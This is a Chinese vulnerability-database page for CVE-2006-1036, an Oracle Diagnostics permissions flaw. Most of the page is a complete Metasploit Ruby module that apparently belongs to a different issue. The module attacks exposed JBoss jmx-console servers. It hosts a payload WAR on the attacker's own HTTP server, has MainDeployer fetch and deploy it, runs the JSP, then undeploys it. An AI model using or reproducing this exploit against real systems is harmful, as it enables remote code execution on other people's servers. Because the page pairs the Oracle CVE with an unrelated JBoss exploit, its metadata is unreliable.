CVE-2006-1036
CVSS7.5
发布时间 :2006-03-07 06:02:00
修订时间 :2008-09-05 17:00:51
NMCOP    

[原文]Multiple unspecified vulnerabilities in the Oracle Diagnostics module 2.2 and earlier have unknown impact and attack vectors, related to "permissions."


[CNNVD]Oracle诊断模块 多个不明漏洞(CNNVD-200603-088)

        Oracle诊断模块 2.2和更早期版本中的多个不明漏洞存在与"许可"有关的不明影响和攻击矢量。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:oracle:diagnostics:2.0Oracle Diagnostics 2.0
cpe:/a:oracle:diagnostics:2.1Oracle Diagnostics 2.1
cpe:/a:oracle:diagnostics:2.2Oracle Diagnostics 2.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1036
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1036
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-088
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16844
(PATCH)  BID  16844
http://www.integrigy.com/info/IntegrigySecurityAnalysis-OracleDiag0206.pdf
(VENDOR_ADVISORY)  MISC  http://www.integrigy.com/info/IntegrigySecurityAnalysis-OracleDiag0206.pdf
http://secunia.com/advisories/19076
(UNKNOWN)  SECUNIA  19076

- 漏洞信息

Oracle诊断模块 多个不明漏洞
高危 资料不足
2006-03-07 00:00:00 2006-03-08 00:00:00
远程  
        Oracle诊断模块 2.2和更早期版本中的多个不明漏洞存在与"许可"有关的不明影响和攻击矢量。

- 公告与补丁

        暂无数据

- 漏洞信息 (F86544)

JBoss JMX Console Deployer Upload and Execute (PacketStormID:F86544)
2010-02-23 00:00:00
jduck  metasploit.com
exploit,web
CVE-2006-1036
[点击下载]

This Metasploit module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.

##
# $Id: jboss_maindeployer.rb 8575 2010-02-21 01:44:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer
	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'JBoss JMX Console Deployer Upload and Execute',
			'Description' => %q{
					This module can be used to execute a payload on JBoss servers that have
				an exposed "jmx-console" application. The payload is put on the server by
				using the jboss.system:MainDeployer functionality. To accomplish this, a
				temporary HTTP server is created to serve a WAR archive containing our
				payload. This method will only work if the target server allows outbound
				connections to us.
			},
			'Author'      => [ 'jduck' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 8575 $',
			'References'  =>
				[
					[ 'CVE', '2006-1036' ],
					[ 'OSVDB', '33744' ],
					[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
				],
			'Privileged'  => true,
			'Platform'    => [ 'win' ], # linux untested
			'Stance'      => Msf::Exploit::Stance::Aggressive,
			'Targets'     =>
				[
					#
					# detect via /manager/serverinfo
					#
					[ 'Automatic', { } ],

					#
					# Platform specific targets only
					#
					[ 'Windows Universal',
						{
							'Arch' => ARCH_X86,
							'Platform' => 'win'
						},
					]
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('PATH', [ true,  "The URI path of the console", '/jmx-console'])
			], self.class)
	end


	def auto_target
		print_status("Attempting to automatically select a target...")

		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
		res = send_request_raw(
			{
				'uri'   => path
			}, 10)

		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end

		arch = nil
		plat = nil
		# TODO: detection requires HTML parsing
		arch = ARCH_X86
		plat = 'win'

		# see if we have a match
		targets.each { |t|
			if (t['Platform'] == plat) and (t['Arch'] == arch)
				return t
			end
		}

		# no matching target found
		return nil
	end


	def exploit
		mytarget = target
		if (target.name =~ /Automatic/)
			mytarget = auto_target
			if (not mytarget)
				raise RuntimeError, "Unable to automatically select a target"
			end
			print_status("Automatically selected target \"#{mytarget.name}\"")
		else
			print_status("Using manually select target \"#{mytarget.name}\"")
		end

		# set arch/platform from the target
		arch = mytarget['Arch']
		plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]

		# Generate the WAR containing the EXE containing the payload
		jsp_name = rand_text_alphanumeric(8+rand(8))
		@war_data = Msf::Util::EXE.to_jsp_war(framework,
			arch, plat,
			payload.encoded,
			:jsp_name => jsp_name)

		#
		# UPLOAD
		#
		app_base = rand_text_alphanumeric(8+rand(8))
		resource_uri = '/' + app_base + '.war'
		service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
		print_status("Starting up our web service on #{service_url} ...")
		start_service({'Uri' => {
				'Proc' => Proc.new { |cli, req|
					on_request_uri(cli, req)
				},
				'Path' => resource_uri
			}})
		print_status("Making the request to the MainDeployer...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
			'vars_post' =>
				{
					'action'      => 'invokeOp',
					'name'        => 'jboss.system:service=MainDeployer',
					'methodIndex' => '21',  # deploy via java.net.URL
					'arg0'        => service_url
				}
		}, 20)
		if (! res)
			raise RuntimeError, "Unable to deploy WAR archive [No Response]"
		end
		if (res.code < 200 or res.code >= 300)
			case res.code
			when 401
				print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
			end
			raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
		end

		# wait for the data to be sent
		print_status("Waiting for the server to request the WAR archive....")
		waited = 0
		while (not @war_sent)
			select(nil, nil, nil, 1)
			waited += 1
			if (waited > 30)
				raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
			end
		end

		print_status("Shutting down the web service...")
		stop_service


		#
		# EXECUTE
		#
		print_status("Executing #{app_base}...")
		res = send_request_cgi({
			'uri'     => '/' + app_base + '/' + jsp_name + '.jsp',
			'method'  => 'GET'
		}, 20)

		if (! res)
			print_error("Execution failed on #{app_base} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
		end


		#
		# DELETE
		#
		print_status("Undeploying #{app_base} ...")
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => datastore['PATH'] + '/HtmlAdaptor',
			'vars_post' =>
				{
					'action'      => 'invokeOp',
					'name'        => 'jboss.system:service=MainDeployer',
					'methodIndex' => '3',  # undeploy via java.String
					'arg0'        => app_base
				}
		}, 20)
		if (! res)
			print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
		elsif (res.code < 200 or res.code >= 300)
			print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
		end

		handler
	end


	# Handle incoming requests from the server
	def on_request_uri(cli, request)

		#print_status("on_request_uri called: #{request.inspect}")
		if (not @war_data)
			print_error("A request came in, but the WAR archive wasn't ready yet!")
			return
		end

		print_status("Sending the WAR archive to the server...")
		send_response(cli, @war_data)
		@war_sent = true
	end

end
    

- 漏洞信息

23652
Oracle E-Business Suite Diagnostics Log File Disclosure

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-02-23 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站